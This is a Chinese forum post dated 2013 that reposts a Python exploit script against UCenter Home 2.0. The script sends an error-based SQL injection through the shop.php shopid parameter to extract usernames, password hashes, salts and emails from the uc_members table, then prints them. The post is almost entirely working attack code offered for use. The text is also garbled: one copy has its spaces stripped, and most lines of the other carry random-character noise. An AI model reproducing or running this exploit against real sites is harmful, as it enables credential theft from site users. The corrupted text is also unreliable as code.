#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
4 _2 M0 A1 x" g7 B- o$ a0 z
/ g$ f2 v/ W: E: B) z$ v5 i
# g! [$ n- P+ {% Q0 A( A#!/usr/bin/env python
, }4 E: D( s5 f8 |# } ' x/ b. ]4 Q1 M0 G
import sys " l. }2 A; o; G8 g
import urllib2 8 p( Y( E, V- `+ a$ I8 I
import re ' K: f$ w5 [9 `% z% [( p
7 i1 J/ ?* R# Z4 I4 g3 K# Y6 Sdef info(): " Q2 W- r0 \- {. E6 D' \" T8 S4 ?* M! w
print 'From:http://www.exploit-db.com/exploits/14997/'
, J- G6 ?8 J( U6 g% _0 \ print 'http://www.hake.cc/Web_loudong/'
# h- D; H( f6 e+ D4 ~% \1 d: a# n print 'changed:qiaoy' 8 }/ n, ]* N) Q/ R# g! h
print 'exp:' + e) k: ]$ G8 ?4 D1 T! m: k
print ' ./UCenter_Home_2.0.py site' : ]- P& A; o6 D2 [+ B
Z" C4 ?/ S; B" g3 k y' g# R
def main():
/ i6 x3 J+ W9 z# } if len(sys.argv) != 2:
9 n0 ~( n+ G* T, S) C info() ( T5 R; @5 c, |, j: L
else: * q+ v; T1 e3 |" i X! O
site = sys.argv[1] 1 O! e: L# P4 z6 q1 Y
if site[0:7] == 'http://': 0 g/ o* _ V# R1 ]) b# B7 r0 ]1 ^
sitesite =site / S! F* Y3 H8 {2 J& H5 I
elif site[0:8] == 'https://':
! ~: u4 @+ F. w" z1 A- F) A sitesite = site ! y7 r* z! n. T3 G6 d9 D( d% b: L! P4 M
else: l' C V9 v9 m( p' M
site = 'http://'+site
. T: |0 \1 \. `6 D- \# s: Y7 t try:
6 j! F* H! w; V( q url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
( d( B, S8 p/ W$ \ q# D Value = urllib2.urlopen(url).read() 5 T' @" {4 d. e5 X; o/ m
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
" r" { W& S8 C7 }' W7 x hacked = Msg.split(':') ) Q( c0 P" \. e& l( }" C
print 'Name: '+hacked[1]
* |7 j% `* y: Q) X- C8 `8 f1 t: Z( W print 'Passwd: '+hacked[2] 6 _2 M4 m$ i0 e6 |
print 'salt: '+hacked[3]
' E' h1 t% `# z9 Y( k' P print 'email: '+hacked[4] 2 S: X) {6 h; T- t* m; M
except: & K) l. Y( P; a& ~
print 'Sorry,I can\'t work............'
" g; \( c& f9 x, ^
+ H4 g% O7 e4 E/ M& r$ S3 gif __name__ == '__main__':
3 l- t/ V8 x: t% ?4 n+ k main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对